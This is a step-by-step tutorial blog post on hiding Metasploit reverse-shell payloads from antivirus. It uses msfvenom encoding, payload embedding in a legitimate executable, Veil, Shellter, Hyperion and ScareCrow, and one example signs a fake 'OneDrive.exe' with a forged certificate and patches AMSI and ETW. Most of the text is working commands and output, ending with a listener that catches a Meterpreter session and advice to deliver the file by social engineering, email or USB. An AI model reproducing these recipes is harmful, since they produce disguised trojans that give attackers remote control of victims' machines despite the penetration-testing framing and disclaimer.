Author: Arnel C. Reyes 
Published: 13 August 2024 
Last Updated: 13 August 2024 
 
Metasploit is a powerful framework widely used for penetration testing, exploit development, and vulnerability research. One of its significant capabilities is the creation of payloads designed to execute on target systems. However, modern antivirus (AV) solutions have become adept at detecting and neutralizing these payloads. Metasploit's payload antivirus evasion techniques and tools aim to bypass these security measures, ensuring the payloads can be executed without detection. This involves encoding, obfuscation, embedding payloads in non-malicious files, dynamic shellcode injection, encryption, and more.


Background

As cybersecurity measures evolve, so do the techniques attackers and penetration testers use to bypass them. Antivirus evasion has become an essential skill for ethical hackers, as AV software increasingly incorporates advanced detection mechanisms like heuristic analysis, machine learning, and signature-based detection. Metasploit, along with other tools, provides a variety of methods to evade AV detection, enabling penetration testers to assess the security posture of systems more effectively. Understanding these techniques helps in developing more robust defenses by simulating real-world attack scenarios.
 

Metasploit Payload Antivirus Evasion Techniques

Antivirus evasion techniques are crucial in penetration testing and ethical hacking, where the goal is to simulate real-world attacks and test the robustness of security systems. By evading antivirus detection, penetration testers can deploy payloads that more accurately represent the threats posed by actual attackers, thus providing a more thorough security assessment.

1. Encoding with 'msfvenom -e' Option: Encoding is one of the simplest forms of antivirus evasion in Metasploit. The 'msfvenom -e' option allows users to encode their payloads using a variety of encoders available in Metasploit. This technique modifies the payload's appearance without altering its functionality, helping it evade signature-based detection by AV software.
    
   
   • Setup and Installation
     
     No special installation is required for using the 'msfvenom -e' option, as it is part of the Metasploit Framework. Ensure that Metasploit is installed on the system (e.g., using Kali Linux).
      
   • Usage
     
     To encode a payload, use the following command:
      

     $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<METASPLOIT_IP> LPORT=<METASPLOIT_PORT> -e x86/shikata_ga_nai -f exe -o encoded_payload.exe

     
     
   • Example
      

     $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=4444 -e x86/shikata_ga_nai -f exe -o encoded_pa yload.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 381 (iteration=0) x86/shikata_ga_nai chosen with final size 381 Payload size: 381 bytes Final size of exe file: 73802 bytes Saved as: encoded_payload.exe

      
     In this example, the 'x86/shikata_ga_nai' encoder is used to encode the payload. The encoded payload is then saved as 'encoded_payload.exe'.
      
2. Obfuscation with Veil: Veil is a tool designed to generate Metasploit payloads that can bypass antivirus detection. It focuses on obfuscating the payload's code to evade AV signatures and heuristic detection.
    
   
   • Setup and Installation
      

     $ sudo apt update $ sudo apt install veil

     
     
   • Usage
     
     Veil offers different modules such as Veil-Evasion for payload generation and Veil-Catapult for payload delivery. To start Veil, type 'veil' and it will be presented with a menu.
      
     

     $ veil ===============================================================================                              Veil | [Version]: 3.1.14 ===============================================================================       [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================   Main Menu           2 tools loaded   Available Tools:           1)      Evasion         2)      Ordnance   Available Commands:           exit                    Completely exit Veil         info                    Information on a specific tool         list                    List available tools         options                 Show Veil configuration         update                  Update Veil         use                     Use a specific tool Veil>:

      
     
   • Example
     
     » Create payload using evasion by typing 'use 1'
      
     

     Veil>: use 1 ===============================================================================                                    Veil-Evasion ===============================================================================       [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================   Veil-Evasion Menu           41 payloads loaded   Available Commands:           back                    Go to Veil's main menu         checkvt                 Check VirusTotal.com against generated hashes         clean                   Remove generated artifacts         exit                    Completely exit Veil         info                    Information on a specific payload         list                    List available payloads         use                     Use a specific payload   Veil/Evasion>:

      
     » List available payloads by typing 'list'
      
     

     Veil/Evasion>: list ===============================================================================                                    Veil-Evasion ===============================================================================       [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================    [*] Available Payloads:           1)      autoit/shellcode_inject/flat.py         2)      auxiliary/coldwar_wrapper.py         3)      auxiliary/macro_converter.py         4)      auxiliary/pyinstaller_wrapper.py         5)      c/meterpreter/rev_http.py         6)      c/meterpreter/rev_http_service.py         7)      c/meterpreter/rev_tcp.py         8)      c/meterpreter/rev_tcp_service.py         9)      cs/meterpreter/rev_http.py         10)     cs/meterpreter/rev_https.py         11)     cs/meterpreter/rev_tcp.py         12)     cs/shellcode_inject/base64.py         13)     cs/shellcode_inject/virtual.py         14)     go/meterpreter/rev_http.py         15)     go/meterpreter/rev_https.py         16)     go/meterpreter/rev_tcp.py         17)     go/shellcode_inject/virtual.py         18)     lua/shellcode_inject/flat.py         19)     perl/shellcode_inject/flat.py         20)     powershell/meterpreter/rev_http.py         21)     powershell/meterpreter/rev_https.py         22)     powershell/meterpreter/rev_tcp.py         23)     powershell/shellcode_inject/psexec_virtual.py         24)     powershell/shellcode_inject/virtual.py         25)     python/meterpreter/bind_tcp.py         26)     python/meterpreter/rev_http.py         27)     python/meterpreter/rev_https.py         28)     python/meterpreter/rev_tcp.py         29)     python/shellcode_inject/aes_encrypt.py         30)     python/shellcode_inject/arc_encrypt.py         31)     python/shellcode_inject/base64_substitution.py         32)     python/shellcode_inject/des_encrypt.py         33)     python/shellcode_inject/flat.py         34)     python/shellcode_inject/letter_substitution.py         35)     python/shellcode_inject/pidinject.py         36)     python/shellcode_inject/stallion.py         37)     ruby/meterpreter/rev_http.py         38)     ruby/meterpreter/rev_https.py         39)     ruby/meterpreter/rev_tcp.py         40)     ruby/shellcode_inject/base64.py         41)     ruby/shellcode_inject/flat.py   Veil/Evasion>:

      
     » To create meterpreter reverse TCP payload, type 'use 7'.
      
     

     Veil/Evasion>: use 7 ===============================================================================                                    Veil-Evasion ===============================================================================       [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================    Payload Information:           Name:           Pure C Reverse TCP Stager         Language:       c         Rating:         Excellent         Description:    pure windows/meterpreter/reverse_tcp stager, no                         shellcode   Payload: c/meterpreter/rev_tcp selected    Required Options:   Name                    Value           Description ----                    -----           ----------- COMPILE_TO_EXE          Y               Compile to an executable LHOST                                   IP of the Metasploit handler LPORT                   4444            Port of the Metasploit handler    Available Commands:           back            Go back to Veil-Evasion         exit            Completely exit Veil         generate        Generate the payload         options         Show the shellcode's options         set             Set shellcode option   [c/meterpreter/rev_tcp>>]:

      
     » Set local host using 'set LHOST <METASPLOIT_IP>' command and local port using 'set LPORT <METASPLOIT_PORT>' command.
      
     

     [c/meterpreter/rev_tcp>>]: set LHOST 192.168.1.18 [c/meterpreter/rev_tcp>>]: set LPORT 4444

     
     » To generate the meterpreter payload, type 'generate' command.
      
     

     [c/meterpreter/rev_tcp>>]: generate ===============================================================================                                    Veil-Evasion ===============================================================================       [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================    [>] Please enter the base name for output files (default is payload): obfuscated_payload ===============================================================================                                    Veil-Evasion ===============================================================================       [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================    [*] Language: c  [*] Payload Module: c/meterpreter/rev_tcp  [*] Executable written to: /var/lib/veil/output/compiled/obfuscated_payload.exe  [*] Source code written to: /var/lib/veil/output/source/obfuscated_payload.c  [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/obfuscated_payload.rc   Hit enter to continue...

      
3. Embedding in Non-Malicious Files with 'msfvenom -x' Option: Embedding a payload in a non-malicious file is an effective way to evade antivirus detection. The 'msfvenom -x' option allows users to embed a Metasploit payload into a legitimate executable, making it less likely to be flagged as malicious.
    
   
   • Setup and Installation
     
     Like encoding, this technique is built into Metasploit, so no additional installation is required.
      
   • Usage
     
     To embed a payload into a non-malicious executable, use the following command:
      

     $ msfvenom -x legitimate.exe -p windows/meterpreter/reverse_tcp LHOST=<METASPLOIT_IP> LPORT=<METASPLOIT_PORT> -f exe -o infected_legitimate.exe

      
     
   • Example
      

     $ msfvenom -x legitimate.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=4444 -f exe -o infected_legitimate.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of exe file: 1018880 bytes Saved as: infected_legitimate.exe

      
     In this example, 'legitimate.exe' is the legitimate executable file, and 'infected_legitimate.exe' is the resulting file containing the embedded payload.
      
4.  Dynamic Shellcode Injection with Shellter: Shellter is a dynamic shellcode injection tool that integrates Metasploit payloads into legitimate Windows applications, allowing for more advanced antivirus evasion. Unlike static methods, Shellter works by injecting shellcode into a running process, making detection much more difficult.
    
   
   • Setup and Installation
     
     

     $ sudo apt-get update $ sudo apt-get install shellter

     
     » On Windows Machine
         › Download Shellter from the official website: https://www.shellterproject.com/download/.
         › Extract the downloaded file and run the executable (e.g., 'shellter.exe').
      
   • Usage
     
     » Start Shellter by using 'shellter' command.
      
     

     $ shellter         1010101 01   10 0100110 10     01  11001001 0011101 001001         11      10   01 00      01     01     01    10      11   10         0010011 1110001 11011   11     10     00    10011   011001              11 00   10 01      11     01     11    01      01   11         0010010 11   00 0011010 100111 000111 00    1100011 01   10 v7.2         www.ShellterProject.com   Choose Operation Mode - Auto/Manual (A/M/H):

     
     » Choose 'Auto' and enter the path of the executable file that will be injected (e.g., a legitimate executable application).
      
     

     Choose Operation Mode - Auto/Manual (A/M/H): a   Perform Online Version Check? (Y/N/H): y   Getting latest version information from the official website...   You have the latest version!   PE Target: /home/kali/legitimate.exe

      
     Note: Select manual mode and specify the Metasploit payload to inject.
      
     

     ********** * Backup * **********   Backup: Shellter_Backups\legitimate.exe   ******************************** * PE Compatibility Information * ********************************   Minimum Supported Windows OS: 4.0   Note: It refers to the minimum required Windows version for the target       application to run. This information is taken directly from the       PE header and might be not always accurate.   ****************** * Packed PE Info * ******************   Status: Possibly Not Packed - The EntryPoint is located in the first section!   *********************** * PE Info Elimination * ***********************   Data: Dll Characteristics (Dynamic ImageBase etc...), Digital Signature.   Status: All related information has been eliminated!   **************** * Tracing Mode * ****************   Status: Tracing has started! Press CTRL+C to interrupt tracing at any time.   Note: In Auto Mode, Shellter will trace a random number of instructions       for a maximum time of approximately 30 seconds in native Windows       hosts and for 60 seconds when used in Wine.   DisASM.dll was created successfully!   The following PEB flags have been reset:   1. PEB.BeingDebugged   2. PEB.NtGlobalFlag   New Thread Created!   ID: 0x8ca4   StartAddress: 0x15010290   Thread Environment Block: 0x3c4000   Instructions Traced: 51399   Tracing Time Approx: 0.531 mins.   Starting First Stage Filtering...   ************************* * First Stage Filtering * *************************   Filtering Time Approx: 0.00427 mins.

      
     » Enable stealth mode for more invisibility.
      
     

     Enable Stealth Mode? (Y/N/H): y

      
     » Select payload to use from the list or custom payload.
      
     

     ************ * Payloads * ************   [1] Meterpreter_Reverse_TCP   [stager] [2] Meterpreter_Reverse_HTTP  [stager] [3] Meterpreter_Reverse_HTTPS [stager] [4] Meterpreter_Bind_TCP      [stager] [5] Shell_Reverse_TCP         [stager] [6] Shell_Bind_TCP            [stager] [7] WinExec   Use a listed payload or custom? (L/C/H): l   Select payload by index: 1

     
     » Set local host IP and Port of the Metasploit listener. 
     
     

     *************************** * meterpreter_reverse_tcp * ***************************   SET LHOST: 192.168.1.18   SET LPORT: 4444

      
     » Shellter will dynamically inject the shellcode into the selected process, creating a new executable that can bypass AV detection.
      
     

     **************** * Payload Info * ****************   Payload: meterpreter_reverse_tcp   Size: 281 bytes   Reflective Loader: NO   Encoded-Payload Handling: Enabled   Handler Type: IAT   ****************** * Encoding Stage * ******************   Encoding Payload: Done!   **************************** * Assembling Decoder Stage * ****************************   Assembling Decoder: Done!   *********************************** * Binding Decoder & Payload Stage * ***********************************   Status: Obfuscating the Decoder using Thread Context Aware Polymorphic         code, and binding it with the payload.   Please wait...   Binding: Done!   ********************* * IAT Handler Stage * *********************   Fetching IAT Pointers to Memory Manipulation APIs...   0. VirtualAlloc --> IAT[4541d8] 1. VirtualAllocEx --> N/A 2. VirtualProtect --> N/A 3. VirtualProtectEx --> N/A 4. HeapCreate/HeapAlloc --> IAT[4541bc]/IAT[454150] 5. LoadLibrary/GetProcAddress --> IAT[454204]/IAT[454110] 6. GetModuleHandle/GetProcAddress --> IAT[454128]/IAT[454110] 7. CreateFileMapping/MapViewOfFile --> IAT[454230]/IAT[454228]   Using Method --> 5   *************************** * IAT Handler Obfuscation * ***************************   Status: Binding the IAT Handler with Thread Context Aware Polymorphic code.   Please wait...   Code Generation Time Approx: 0.128 seconds.   ************************* * PolyMorphic Junk Code * *************************   Type: Engine   Generating: ~308 bytes of PolyMorphic Junk Code   Please wait...   Generated: 311 bytes   Code Generation Time Approx: 0.128 seconds.   Starting Second Stage Filtering...   ************************** * Second Stage Filtering * **************************   Filtering Time Approx: 0.00213 mins.   ******************* * Injection Stage * *******************   Virtual Address: 0x41eb8e   File Offset: 0x1df8e   Section: .text   Adjusting stub pointers to IAT...   Done!   Adjusting Call Instructions Relative Pointers...   Done!   Injection Completed!   ******************* * PE Checksum Fix * *******************   Status: Valid PE Checksum has been set!   Original Checksum: 0x0   Computed Checksum: 0x1014dd   ********************** * Verification Stage * **********************   Info: Shellter will verify that the first instruction of the       injected code will be reached successfully.       If polymorphic code has been added, then the first       instruction refers to that and not to the effective       payload.       Max waiting time: 10 seconds.    Warning!  If the PE target spawns a child process of itself before  reaching the injection point, then the injected code will  be executed in that process. In that case Shellter won't  have any control over it during this test.  You know what you are doing, right? ;o)   Injection: Verified!   Press [Enter] to continue...

      
5. Obfuscation and Encryption with Hyperion: Hyperion is a tool used to encrypt Metasploit payloads, making them harder for antivirus software to detect. Hyperion operates by encrypting the payload and then using a simple decryption stub to decrypt and execute the payload in memory.
    
   
   • Setup and Installation
     
     » Hyperion is included in Kali Linux by default, but it can also compile it from source. To locate Hyperion directory, use the following commands:
      
     

     $ find / -name '*hyperion*' $ dpkg -L hyperion

      
     If not installed, use the following command to install Hyperion:
      
     

     $ sudo apt update && sudo apt upgrade -y $ sudo apt install hyperion

      
     » To compile Hyperion on Kali:
      
     

     $ sudo apt install git mingw-w64 gcc-multilib $ git clone https://github.com/nullsecuritynet/tools $ cd tools/windows-binaries/hyperion $ make

      
     » Install Wine
      
     

     $ sudo apt-get update $ sudo apt-get dist-upgrade $ sudo dpkg --add-architecture i386 $ sudo mkdir -pm755 /etc/apt/keyrings $ sudo wget -O /etc/apt/keyrings/winehq-archive.key https://dl.winehq.org/wine-builds/winehq.key $ sudo wget -NP /etc/apt/sources.list.d/ https://dl.winehq.org/wine-builds/debian/dists/bookworm/winehq-bookworm.sources $ sudo apt-get install wine32

      
   • Usage
     
     To encrypt a payload with Hyperion, use the following command:
      
     

     $ wine /path/to/hyperion.exe <input_payload.exe> <output_encrypted_payload.exe>

      
   • Example:
      
     

     $ sudo wine /usr/share/windows-resources/hyperion/hyperion.exe rev_tcp_payload.exe encrypted_rev_tcp_payload.exe

      
     In this example, it will create an encrypted version of the payload that can be used to evade antivirus detection.
     
     
   • Troubleshooting for 'err:virtual:allocate_virtual_memory out of memory for allocation'.
     
     

     $ sudo swapoff /swapfile $ sudo rm /swapfile $ sudo dd if=/dev/zero of=/swapfile bs=1M count=4096 $ sudo chmod 600 /swapfile $ sudo mkswap /swapfile $ sudo swapon /swapfile $ sudo swapon --show $ free -h

      
     This will increase memory allocation to 4GB.
      
     
6. Encrypt and Sign with ScareCrow: ScareCrow is a tool designed to generate and sign Windows payloads that can evade antivirus and endpoint detection. It uses techniques like encryption and digital signing to make the payload appear as a legitimate application.
    
   
   • Setup and Installation
      
     » Install Go if it’s not already installed, as ScareCrow is written in Go.
      
     

     $ sudo apt-get update $ sudo apt-get install golang-go   $ sudo apt install gccgo-go $ sudo apt install golang-go   $ go install mvdan.cc/garble@latest $ go get github.com/fatih/color $ go get github.com/yeka/zip $ go get github.com/josephspurrier/goversioninfo $ go get github.com/Binject/debug/pe $ go get github.com/awgh/rawreader

      
     » Install OpenSSL, OSSSignCode, and MingW-w64.
        › OpenSSL is already installed on most Linux systems, but it can be updated or installed it if needed.
        › OSSSignCode is a tool for signing and verifying PE executables (exe, dll).
        › MingW-w64 is a compiler suite for Windows, which is necessary for compiling Windows executables on Linux.
      
     

     $ sudo apt-get install openssl $ sudo apt-get install osslsigncode $ sudo apt-get install mingw-w64

      
     » Clone the ScareCrow from Github repository and build executable:
      
     

     $ git clone https://github.com/optiv/ScareCrow.git $ cd ScareCrow $ go build ScareCrow.go

      
     
   • Usage
     
     To create an encrypted and signed payload with ScareCrow, use the following command:
      

     $ ./ScareCrow -I <payload> -O <output_file>

      
   • Example
      
     » First, create a payload using 'msfvenom'.
     
     

     $ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.18 LPORT=4444 -f raw -o rev_tcp_payload.bin

      
     » Generate an encrypted and signed payload using the following command:
      
     

     $ ./ScareCrow -I rev_tcp_payload.bin -domain microsoft.com -encryptionmode AES     _________                           _________  /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __  \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /  /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / /_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/         \/     \/     \/            \/        \/                                                         (@Tyl0us)         “Fear, you must understand is more than a mere obstacle.         Fear is a TEACHER. the first one you ever had.”   [+] Shellcode Encrypted [+] Patched ETW Enabled [+] Patched AMSI Enabled [+] Sleep Timer set for 2323 milliseconds [*] Creating an Embedded Resource File [+] Created Embedded Resource File With OneDrive's Properties [*] Compiling Payload [+] Payload Compiled [*] Signing OneDrive.exe With a Fake Cert [+] Signed File Created [+] Binary Compiled [!] Sha256 hash of OneDrive.exe: 075e2a951540f9f8a366fdcc01f291db7f4eae176929fb8356ecd29e8858d4ed

      
     In this example, ScareCrow will generate a payload that is encrypted and signed, making it less likely to be detected by antivirus software.

These tools and techniques provide various methods for evading antivirus detection when using Metasploit payloads, each with its unique approach to bypassing security measures. Each of these methods aims to bypass different types of detection mechanisms employed by antivirus software, allowing the payload to execute on the target system without being blocked or flagged.


Testing the Payload

To catch the incoming connection from the payload, it needs to set up a listener. 

1. Open Metasploit using the following command:
    
   

   $ msfconsole

    
2. Use the Multi/Handler Module by setting up a handler for the payload:
    
   

   msf6 > use exploit/multi/handler [*] Using configured payload windows/meterpreter_reverse_tcp

    
   
3. Configure the Payload by setting the payload to match the generated client payload:
   
   

   msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp

    
4. Set the 'LHOST' and 'LPORT' to match the values used when generating the payload:
    
   

   set LHOST <metasploit_listener_ip> set LPORT <metasploit_listener_port>

    
   Example:
    
   

   msf6 exploit(multi/handler) > set LHOST 192.168.1.18 LHOST => 192.168.1.18 msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444

    
   
5. Start the Listener using 'exploit -j' command:
   
   

   msf6 exploit(multi/handler) > exploit -j -z [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [-] Handler failed to bind to 192.168.1.18:4444 [*] Started reverse TCP handler on 0.0.0.0:4444

    
   › The -j option runs the handler as a background job.
   › The -z option prevents the handler from interacting with any sessions that it creates, allowing it to keep running in the background without interruption.
    
   
6. Verify that the listener is running in the background using 'jobs' command:
    
   

   msf6 exploit(multi/handler) > jobs Jobs ====     Id  Name                    Payload                          Payload opts   --  ----                    -------                          ------------   1   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://192.168.1.18:4444

    
   » To stop a listener, use the '' command:
    
   

   jobs -k <job_id>

    
   
7. Deploy the Payload
   
   • Deliver the Payload: Transfer the generated payload to the target system using a preferred method (e.g., social engineering, email, USB).
     
   • Execute the Payload: Once the payload is executed on the target machine, it should connect back to the Metasploit listener.
      
     
8. Monitor and Interact 
   
   • Monitor the Connection: Check the Metasploit console for incoming sessions.
      
     

     [*] Sending stage (176198 bytes) to 192.168.1.8 [*] Meterpreter session 1 opened (192.168.1.18:4444 -> 192.168.1.8:49254) at 2024-08-13 20:00:44 -0400

      
     
   • Interact with the Session: If a connection is established, it can be interacted with the session using the following commands:
     
     View active sessions using the following command:
      
     

     msf6 exploit(multi/handler) > sessions   Active sessions ===============     Id  Name  Type                     Information                      Connection   --  ----  ----                     -----------                      ----------   1         meterpreter x64/windows  SECSCI\SECSCI @ SECSCI           192.168.56.103:4444 -> 192.168.1.8:49254 (192.168.1.8)

     
     Interaction to a session using 'sessions -i <session_id>' command:
     
     

     msf6 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ipconfig Interface  1 ============ Name         : Software Loopback Interface 1 Hardware MAC : 00:00:00:00:00:00 MTU          : 4294967295 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface  2 ============ Name         : VirtualBox Host-Only Ethernet Adapter Hardware MAC : 0a:00:27:00:00:0a MTU          : 1500 IPv4 Address : 192.168.1.18 IPv4 Netmask : 255.255.255.0 IPv6 Address : fe80::a3be:3151:b7c:5d6b IPv6 Netmask : ffff:ffff:ffff:ffff:: Interface  3 ============ Name         : Microsoft Wi-Fi Direct Virtual Adapter Hardware MAC : d6:6a:6a:a1:4c:21 MTU          : 1500 IPv4 Address : 169.254.212.76 IPv4 Netmask : 255.255.0.0 IPv6 Address : fe80::bef6:9141:d43e:fbaf IPv6 Netmask : ffff:ffff:ffff:ffff::

      
     

Conclusion

Metasploit payload antivirus evasion is a critical aspect of penetration testing, allowing testers to bypass sophisticated security measures and execute payloads on target systems. By mastering techniques like encoding, obfuscation, and encryption, testers can enhance the effectiveness of their security assessments. However, it's essential to use these tools responsibly and within the boundaries of legal and ethical hacking practices, as they can also be employed for malicious purposes.
 
Disclaimer: This documentation is intended for educational purposes only. The content provided herein is meant to inform and educate individuals about security practices, techniques, and tools. Security-Science does not support, endorse, or encourage any illegal or unethical activities, including but not limited to unauthorized access to computer systems, networks, or data. Users are advised to apply the knowledge gained responsibly and ensure compliance with all applicable laws and regulations. Security-Science shall not be held liable for any misuse of the information provided.